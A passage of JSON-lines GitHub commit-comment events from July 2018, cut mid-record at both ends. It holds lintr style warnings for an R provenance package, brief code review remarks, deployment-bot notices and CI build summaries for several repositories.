^~~~~~~~~~~~~~~\n```\n[R/Annotation.R:1142:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1142) *style:* **Variable or function name should be snake_case.**\n```r\n​    annotated.block <- .ddg.add.block.start.finish(annotated.block, \n    ^~~~~~~~~~~~~~~\n```\n[R/Annotation.R:1149:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1149) *style:* **Variable or function name should be snake_case.**\n```r\n​    block.txt <- deparse(block)\n    ^~~~~~~~~\n```\n[R/Annotation.R:1150:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1150) *style:* **Variable or function name should be snake_case.**\n```r\n​    annotated.block.txt <- deparse(annotated.block)\n    ^~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:1154:7:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1154) *style:* **Variable or function name should be snake_case.**\n```r\n​      firstLine <- paste(\"for (\", deparse(parsed.command[[2]]), \" in \", \n      ^~~~~~~~~\n```\n[R/Annotation.R:1158:7:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1158) *style:* **Variable or function name should be snake_case.**\n```r\n​      firstLine <- paste(\"while (\", deparse(parsed.command[[2]]), \") {\", sep=\"\")\n      ^~~~~~~~~\n```\n[R/Annotation.R:1161:7:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1161) *style:* **Variable or function name should be snake_case.**\n```r\n​      firstLine <- paste(\"repeat {\", sep=\"\")\n      ^~~~~~~~~\n```\n[R/Annotation.R:1164:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1164) *style:* **Variable or function name should be snake_case.**\n```r\n​    parsed.command.txt <- paste(c(firstLine,\n    ^~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:1182:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1182) *style:* **Variable or function name should be snake_case.**\n```r\n​  parsed.command.txt <- \n  ^~~~~~~~~~~~~~~~~~\n```\n"}},"created_at":"2018-07-31T17:24:45Z"}
{"id":"8045534232","type":"CommitCommentEvent","actor":{"login":"d4rk694"},"repo":{"name":"AmauriC/tarteaucitron.js"},"payload":{"comment":{"id":29908294,"position":41,"line":1302,"path":"tarteaucitron.js","commit_id":"1ea7bfa82ab2fca3ca1faacd66b96f39b4e638d4","created_at":"2018-07-31T17:24:49Z","updated_at":"2018-07-31T17:24:49Z","author_association":"CONTRIBUTOR","body":"Le code fonctionne sans soucis, il y a d'autres erreurs dans le commit? "}},"created_at":"2018-07-31T17:24:49Z"}
{"id":"8045534790","type":"CommitCommentEvent","actor":{"login":"sharkinsspatial"},"repo":{"name":"AnkitaKhurana/oam-admin"},"payload":{"comment":{"id":29908297,"position":24,"line":24,"path":"src/components/Images.js","commit_id":"1d8f88c164d71b96b13cbdd9ad027eeec3b535ed","created_at":"2018-07-31T17:24:54Z","updated_at":"2018-07-31T17:24:54Z","author_association":"COLLABORATOR","body":"When using map or reduce functions it is good practice to name the iterator value as the singular of the array.  In this case `image` instead of `item` for clarity."}},"created_at":"2018-07-31T17:24:54Z"}
{"id":"8045535215","type":"CommitCommentEvent","actor":{"login":"wendorf"},"repo":{"name":"wendorf/charts"},"payload":{"comment":{"id":29908300,"position":6,"line":62,"path":"stable/concourse/templates/web-deployment.yaml","commit_id":"1e1793c7e503b055cc3b1e5f17a66463862e6471","created_at":"2018-07-31T17:24:58Z","updated_at":"2018-07-31T17:24:58Z","author_association":"OWNER","body":"My open question to accomplish this is [asked in the Concourse forums](https://discuss.concourse-ci.org/t/4-0-specifying-multiple-local-users-using-environment-variable/405): How can we use environment variable for list parameters? If we have `concourse web --main-team-oauth-user jane --main-team-oauth-user joe` how can I use environment variables? `CONCOURSE_MAIN_TEAM_OAUTH_USER=jane|joe concourse web`? I have no idea.\r\n\r\nI spent some time digging through the ATC code as well as go-flags and left about as confused as when I started."}},"created_at":"2018-07-31T17:24:58Z"}
{"id":"8045537931","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29908306,"position":null,"line":null,"path":null,"commit_id":"eccc8e18b0c91df3aa3cfe4539dfe168f2e2e2c9","created_at":"2018-07-31T17:25:29Z","updated_at":"2018-07-31T17:25:29Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-473](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-473).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-473-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-31T17:25:29Z"}
{"id":"8045538807","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29908308,"position":null,"line":null,"path":null,"commit_id":"094953fc6e164672b2ade7e3ce41f297ffb2bb0a","created_at":"2018-07-31T17:25:39Z","updated_at":"2018-07-31T17:25:39Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-582](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-582).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-582-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-31T17:25:39Z"}
{"id":"8045541181","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29908314,"position":null,"line":null,"path":null,"commit_id":"afcf31c608061f103603ed6ceeb18b8fff9eb537","created_at":"2018-07-31T17:26:05Z","updated_at":"2018-07-31T17:26:05Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-584](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-584).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-584-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-31T17:26:05Z"}
{"id":"8045545173","type":"CommitCommentEvent","actor":{"login":"n2ygk"},"repo":{"name":"pjorg/pjorg-puppet-sumo"},"payload":{"comment":{"id":29908327,"position":null,"line":null,"path":null,"commit_id":"e07d82bce75fcc1ba08f32b156bbad661abcde69","created_at":"2018-07-31T17:26:48Z","updated_at":"2018-07-31T17:26:48Z","author_association":"NONE","body":"@ghoneycutt Can you confirm that forcing all parameter names to lowercase is now *required*? This is a breaking change as our existing manifests use camel case as in release 1.1.1 We are currently on Puppet v4.4.2.  Thanks."}},"created_at":"2018-07-31T17:26:48Z"}
{"id":"8045545584","type":"CommitCommentEvent","actor":{"login":"sharkinsspatial"},"repo":{"name":"AnkitaKhurana/oam-admin"},"payload":{"comment":{"id":29908329,"position":10,"line":11,"path":"src/components/User.js","commit_id":"1d8f88c164d71b96b13cbdd9ad027eeec3b535ed","created_at":"2018-07-31T17:26:53Z","updated_at":"2018-07-31T17:26:53Z","author_association":"COLLABORATOR","body":"`<React.Fragment>` is unnecessary here.  "}},"created_at":"2018-07-31T17:26:53Z"}
{"id":"8045548664","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29908336,"position":null,"line":null,"path":null,"commit_id":"9109748994b617d6d849cceb1181e044fe57a094","created_at":"2018-07-31T17:27:28Z","updated_at":"2018-07-31T17:27:28Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-585](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-585).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-585-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-31T17:27:28Z"}
{"id":"8045549622","type":"CommitCommentEvent","actor":{"login":"irmen"},"repo":{"name":"carandraug/Pyro4"},"payload":{"comment":{"id":29908338,"position":null,"line":null,"path":null,"commit_id":"63902b87435129b636cf7bf0e9b4ea3623263dec","created_at":"2018-07-31T17:27:39Z","updated_at":"2018-07-31T17:27:39Z","author_association":"NONE","body":"core is perhaps okay, but I don't like that the core module now has become the  entrypoint for this feature.  It's okay though to develop it further here for the time being "}},"created_at":"2018-07-31T17:27:39Z"}
{"id":"8045551322","type":"CommitCommentEvent","actor":{"login":"AshtonFox"},"repo":{"name":"AshtonFox/VOREStation"},"payload":{"comment":{"id":29908347,"position":null,"line":null,"path":null,"commit_id":"17986e884b5f87927b2fd3152108f8aac67db064","created_at":"2018-07-31T17:27:58Z","updated_at":"2018-07-31T17:27:58Z","author_association":"OWNER","body":"мне надо"}},"created_at":"2018-07-31T17:27:58Z"}
{"id":"8045551408","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29908348,"position":null,"line":null,"path":null,"commit_id":"34a0f8f3430d7061c304a7882904b6b8a69abd20","created_at":"2018-07-31T17:27:59Z","updated_at":"2018-07-31T17:27:59Z","author_association":"NONE","body":"#158531941-VerticalVenetianBlindCoefficients (vidanovic) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2999 of 2999 tests passed, 2 test warnings)\n\nMessages:\n\n * 2 tests had: EIO diffs.\n * 1 test had: ESO small diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ small diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-34a0f8f3430d7061c304a7882904b6b8a69abd20-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-34a0f8f3430d7061c304a7882904b6b8a69abd20-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-31T17:27:59Z"}
{"id":"8045551626","type":"CommitCommentEvent","actor":{"login":"BobSenturus"},"repo":{"name":"tableau/extensions-api"},"payload":{"comment":{"id":29908349,"position":5,"line":110,"path":"docs/interfaces/tableauerror.html","commit_id":"5c6b448fd13d3c33c2158fa8bd58fea7d7921b57","created_at":"2018-07-31T17:28:01Z","updated_at":"2018-07-31T17:28:01Z","author_association":"NONE","body":"Were the D drive letter updates intentional?"}},"created_at":"2018-07-31T17:28:01Z"}
{"id":"8045555034","type":"CommitCommentEvent","actor":{"login":"abadams"},"repo":{"name":"halide/Halide"},"payload":{"comment":{"id":29908358,"position":null,"line":null,"path":null,"commit_id":"ffb81962c3acb5484ed3addf6b71e3f481c0adc7","created_at":"2018-07-31T17:28:39Z","updated_at":"2018-07-31T17:28:39Z","author_association":"MEMBER","body":"Yes, before this it couldn't generate dense vector loads"}},"created_at":"2018-07-31T17:28:39Z"}
{"id":"8045560377","type":"CommitCommentEvent","actor":{"login":"Olesia328"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29908374,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-31T17:29:40Z","updated_at":"2018-07-31T17:29:40Z","author_association":"NONE","body":"🙂ок\n\nвт, 31 июля 2018 г. в 20:25, abonmanuk <notifications@github.com>:\n\n> Next to the future\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/iride2020/iRide-Token/commit/8f810b3700a24de0ee4f945ef84be7b2f1605610#commitcomment-29908274>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AnnzBWgc0ZMhV3SN6KOgsD0jacw4S8ybks5uMJLsgaJpZM4VaEAl>\n> .\n>\n"}},"created_at":"2018-07-31T17:29:40Z"}
{"id":"8045560517","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29908375,"position":null,"line":null,"path":null,"commit_id":"1bc72f4c5877bed1483c51e16659148896489164","created_at":"2018-07-31T17:29:42Z","updated_at":"2018-07-31T17:29:42Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-301](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-301).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-301-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-31T17:29:42Z"}
{"id":"8045562393","type":"CommitCommentEvent","actor":{"login":"ripplelabs-jenkins"},"repo":{"name":"ximinez/rippled"},"payload":{"comment":{"id":29908381,"position":null,"line":null,"path":null,"commit_id":"09050a860be745c88a54fbcbce1e317c72f2f51e","created_at":"2018-07-31T17:30:04Z","updated_at":"2018-07-31T17:30:04Z","author_association":"COLLABORATOR","body":"\n## Jenkins Build Summary\n\nBuilt from [this commit](https://github.com/ximinez/rippled/commit/09050a860be745c88a54fbcbce1e317c72f2f51e)\n\nBuilt at __20180731 - 17:30:04__\n\n### Test Results\n\nBuild Type | Log | Result | Status\n---------- | --- | ------ | ------\nmsvc.Debug | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/develop/17//artifact/msvc.Debug.txt) | 1031 cases, 0 failed, t: 540s | PASS :white_check_mark: \ngcc.Debug <br/>-Dcoverage=ON | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/develop/17//artifact/gcc.Debug_Dcoverage_ON.txt) | 1034 cases, 0 failed, t: 840s | PASS :white_check_mark: \ndocs | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/develop/17//artifact/docs.txt) | 1 cases, 0 failed, t: 2s | PASS :white_check_mark: \ngcc.Release <br/>-Dassert=ON, <br/>MANUAL_TESTS=true | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/develop/17//artifact/gcc.Release_Dassert_ON_MANUAL_TESTS_true.txt) | 1101 cases, 0 failed, t: 929s | PASS :white_check_mark: \nmsvc.Debug, <br/>NINJA_BUILD=true | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/develop/17//artifact/msvc.Debug_NINJA_BUILD_true.txt) | 1031 cases, 0 failed, t: 554s | PASS :white_check_mark: \nclang.Debug | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/develop/17//artifact/clang.Debug.txt) | 1034 cases, 0 failed, t: 275s | PASS :white_check_mark: \nrpm | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/develop/17//artifact/rpm.txt) | 1034 cases, 0 failed, t: n/a | PASS :white_check_mark: \ngcc.Debug | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/develop/17//artifact/gcc.Debug.txt) | 1034 cases, 0 failed, t: 287s | PASS :white_check_mark: \nclang.Debug <br/>-Dunity=OFF | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/develop/17//artifact/clang.Debug_Dunity_OFF.txt) | 1030 cases, 0 failed, t: 685s | PASS :white_check_mark: \ngcc.Debug <br/>-Dunity=OFF | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/develop/17//artifact/gcc.Debug_Dunity_OFF.txt) | 1030 cases, 0 failed, t: 304s | PASS :white_check_mark: \nclang.Release <br/>-Dassert=ON | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/develop/17//artifact/clang.Release_Dassert_ON.txt) | 1034 cases, 0 failed, t: 396s | PASS :white_check_mark: \ngcc.Release <br/>-Dassert=ON | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/develop/17//artifact/gcc.Release_Dassert_ON.txt) | 1034 cases, 0 failed, t: 424s | PASS :white_check_mark: \nmsvc.Debug <br/>-Dunity=OFF | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/develop/17//artifact/msvc.Debug_Dunity_OFF.txt) | 1027 cases, 0 failed, t: 1165s | PASS :white_check_mark: \ngcc.Debug <br/>-Dstatic=OFF | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/develop/17//artifact/gcc.Debug_Dstatic_OFF.txt) | 1034 cases, 0 failed, t: 290s | PASS :white_check_mark: \ngcc.Debug <br/>-Dstatic=OFF -DBUILD_SHARED_LIBS=ON | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/develop/17//artifact/gcc.Debug_Dstatic_OFF_DBUILD_SHARED_LIBS_ON.txt) | 1034 cases, 0 failed, t: 290s | PASS :white_check_mark: \ngcc.Debug, <br/>NINJA_BUILD=true | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/develop/17//artifact/gcc.Debug_NINJA_BUILD_true.txt) | 1034 cases, 0 failed, t: 262s | PASS :white_check_mark: \nmsvc.Release | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/develop/17//artifact/msvc.Release.txt) | 1031 cases, 0 failed, t: 392s | PASS :white_check_mark: \nclang.Debug <br/>-Dunity=OFF -Dsan=address, <br/>PARALLEL_TESTS=false, <br/>DEBUGGER=false | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/develop/17//artifact/clang.Debug_Dunity_OFF_Dsan_address_PARALLEL_TESTS_false_DEBUGGER_false.txt) | 1030 cases, 0 failed, t: 650s | PASS :white_check_mark: \nclang.Debug <br/>-Dunity=OFF -Dsan=undefined, <br/>PARALLEL_TESTS=false | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/develop/17//artifact/clang.Debug_Dunity_OFF_Dsan_undefined_PARALLEL_TESTS_false.txt) | 1030 cases, 0 failed, t: 1146s | PASS :white_check_mark: \n\n"}},"created_at":"2018-07-31T17:30:04Z"}
{"id":"8045562605","type":"CommitCommentEvent","actor":{"login":"jtneumann"},"repo":{"name":"jtneumann/webdevbootcamp"},"payload":{"comment":{"id":29908382,"position":null,"line":null,"path":null,"commit_id":"ae2addf9b8827e1cdae7446e8d4c15553f8d82ba","created_at":"2018-07-31T17:30:07Z","updated_at":"2018-07-31T17:30:07Z","author_association":"OWNER","body":"Unable to git 'https://github.com/jtneumann/webdevbootcamp/tree/UIimprovements/YelpCamp/v12/' path to commit with UIimprovement branch so merged branch back to master in the internal v12 repo."}},"created_at":"2018-07-31T17:30:07Z"}
{"id":"8045564299","type":"CommitCommentEvent","actor":{"login":"arkanoid87"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":29908387,"position":294,"line":294,"path":"src/core/qgsfeaturefiltermodel.cpp","commit_id":"7811f38e480aabae9a1c068f4da766da4dc7b0f8","created_at":"2018-07-31T17:30:24Z","updated_at":"2018-07-31T17:30:24Z","author_association":"NONE","body":"There should be an option to se this. I have a relation reference where the referenced table has more than 100 lines and the user has no idea that he is watching a limited subset of the available possibilities."}},"created_at":"2018-07-31T17:30:24Z"}
{"id":"8045565205","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"ungmotti/pcap"},"payload":{"comment":{"id":29908390,"position":null,"line":null,"path":null,"commit_id":"dd95f3fdf9eaa884b62dac82d513e246d8cbe639","created_at":"2018-07-31T17:30:34Z","updated_at":"2018-07-31T17:30:34Z","author_association":"NONE","body":"pcap_test binary file은 github에서 삭제해 주세요."}},"created_at":"2018-07-31T17:30:34Z"}
{"id":"8045568197","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29908398,"position":null,"line":null,"path":null,"commit_id":"fee1ef0cf3e5a62b4436e44cbfbbed181dbc5282","created_at":"2018-07-31T17:31:08Z","updated_at":"2018-07-31T17:31:08Z","author_association":"NONE","body":"159433798-Report-correct-Zone-Infiltration-and-Zone-Ventilation-Volume-Flow-Rates (Myoldmopar) - Win64-Windows-7-VisualStudio-14: OK (2332 of 2332 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fee1ef0cf3e5a62b4436e44cbfbbed181dbc5282-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fee1ef0cf3e5a62b4436e44cbfbbed181dbc5282-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-31T17:31:08Z"}
{"id":"8045571291","type":"CommitCommentEvent","actor":{"login":"testevez"},"repo":{"name":"testevez/d8-atsnj"},"payload":{"comment":{"id":29908404,"position":null,"line":null,"path":null,"commit_id":"64eb11225108fc9b321d94097a94ad043edcd5a8","created_at":"2018-07-31T17:31:42Z","updated_at":"2018-07-31T17:31:42Z","author_association":"OWNER","body":"Created multidev environment [d8-atsnj#ci-125](https://dashboard.pantheon.io/sites/e5e4f786-50c0-497c-819e-36c05121e231#ci-125).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-125-d8-atsnj.pantheonsite.io/)"}},"created_at":"2018-07-31T17:31:42Z"}
{"id":"8045574007","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"ungmotti/pcap"},"payload":{"comment":{"id":29908419,"position":114,"line":114,"path":"main.cpp","commit_id":"a930a000ddbf731f85a2f3c593259a6823121b06","created_at":"2018-07-31T17:32:13Z","updated_at":"2018-07-31T17:32:13Z","author_association":"NONE","body":"smac을 찍는 루틴과 dmad을 찍는 루틴이 거의 비슷하죠? 코드의 중복을 없애도록 별도의 함수를 만들어 보시기 바랍니다."}},"created_at":"2018-07-31T17:32:13Z"}
{"id":"8045574214","type":"CommitCommentEvent","actor":{"login":"deciduously"},"repo":{"name":"deciduously/mifkad"},"payload":{"comment":{"id":29908421,"position":null,"line":null,"path":null,"commit_id":"64bd5d809f21d13f29d16bc191f7d23f573ee6d8","created_at":"2018-07-31T17:32:15Z","updated_at":"2018-07-31T17:32:15Z","author_association":"OWNER","body":"Split up report into kid-level and room-level functions"}},"created_at":"2018-07-31T17:32:15Z"}
{"id":"8045574669","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"End-to-end-provenance/RDataTracker"},"payload":{"comment":{"id":29908422,"position":null,"line":null,"path":null,"commit_id":"eeaa5efdb1b350be2fc7108012b6a5303d7574fc","created_at":"2018-07-31T17:32:20Z","updated_at":"2018-07-31T17:32:20Z","author_association":"NONE","body":"[R/Annotation.R:52:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L52) *style:* **Lines should not be more than 90 characters.**\n```r\n​#' @param graphic.fext (optional) the file extension for a graphics file, defaults to jpeg.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:56:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L56) *style:* **Variable or function name should be snake_case.**\n```r\n​ddg.function <- function(outs.graphic=NULL, outs.data=NULL, \n^~~~~~~~~~~~\n```\n[R/Annotation.R:56:26:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L56) *style:* **Variable or function name should be snake_case.**\n```r\n​ddg.function <- function(outs.graphic=NULL, outs.data=NULL, \n                         ^~~~~~~~~~~~\n```\n[R/Annotation.R:56:45:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L56) *style:* **Variable or function name should be snake_case.**\n```r\n​ddg.function <- function(outs.graphic=NULL, outs.data=NULL, \n                                            ^~~~~~~~~\n```\n[R/Annotation.R:57:26:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L57) *style:* **Variable or function name should be snake_case.**\n```r\n​                         outs.exception=NULL, outs.url=NULL, outs.file=NULL, \n                         ^~~~~~~~~~~~~~\n```\n[R/Annotation.R:57:47:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L57) *style:* **Variable or function name should be snake_case.**\n```r\n​                         outs.exception=NULL, outs.url=NULL, outs.file=NULL, \n                                              ^~~~~~~~\n```\n[R/Annotation.R:57:62:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L57) *style:* **Variable or function name should be snake_case.**\n```r\n​                         outs.exception=NULL, outs.url=NULL, outs.file=NULL, \n                                                             ^~~~~~~~~\n```\n[R/Annotation.R:58:26:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L58) *style:* **Variable or function name should be snake_case.**\n```r\n​                         graphic.fext=\"jpeg\") {\n                         ^~~~~~~~~~~~\n```\n[R/Annotation.R:75:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L75) *style:* **Variable or function name should be snake_case.**\n```r\n​  full.call <- tryCatch (match.call(sys.function(-1), call=call),\n  ^~~~~~~~~\n```\n[R/Annotation.R:75:25:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L75) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  full.call <- tryCatch (match.call(sys.function(-1), call=call),\n                        ^\n```\n[R/Annotation.R:79:33:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L79) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  .ddg.create.start.for.cur.cmd (call)\n                                ^\n```\n[R/Annotation.R:102:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L102) *style:* **Variable or function name should be snake_case.**\n```r\n​ddg.return.value <- function (expr=NULL, cmd.func=NULL) {\n^~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:102:30:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L102) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​ddg.return.value <- function (expr=NULL, cmd.func=NULL) {\n                             ^\n```\n[R/Annotation.R:102:42:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L102) *style:* **Variable or function name should be snake_case.**\n```r\n​ddg.return.value <- function (expr=NULL, cmd.func=NULL) {\n                                         ^~~~~~~~\n```\n[R/Annotation.R:107:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L107) *style:* **Variable or function name should be snake_case.**\n```r\n​  parsed.stmt <- NULL\n  ^~~~~~~~~~~\n```\n[R/Annotation.R:110:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L110) *style:* **Variable or function name should be snake_case.**\n```r\n​    parsed.stmt <- cmd.func()\n    ^~~~~~~~~~~\n```\n[R/Annotation.R:114:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L114) *style:* **Variable or function name should be snake_case.**\n```r\n​  orig.expr <- substitute(expr)\n  ^~~~~~~~~\n```\n[R/Annotation.R:118:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L118) *style:* **Variable or function name should be snake_case.**\n```r\n​  frame.num <- .ddg.get.frame.number(sys.calls())\n  ^~~~~~~~~\n```\n[R/Annotation.R:121:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L121) *style:* **Variable or function name should be snake_case.**\n```r\n​  orig.return <- paste(\"return(\", deparse(orig.expr), \")\", sep=\"\")\n  ^~~~~~~~~~~\n```\n[R/Annotation.R:131:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L131) *style:* **Variable or function name should be snake_case.**\n```r\n​    caller.frame <- .ddg.find.ddg.return.value.caller.frame.number ()\n    ^~~~~~~~~~~~\n```\n[R/Annotation.R:131:68:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L131) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​    caller.frame <- .ddg.find.ddg.return.value.caller.frame.number ()\n                                                                   ^\n```\n[R/Annotation.R:137:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L137) *style:* **Variable or function name should be snake_case.**\n```r\n​    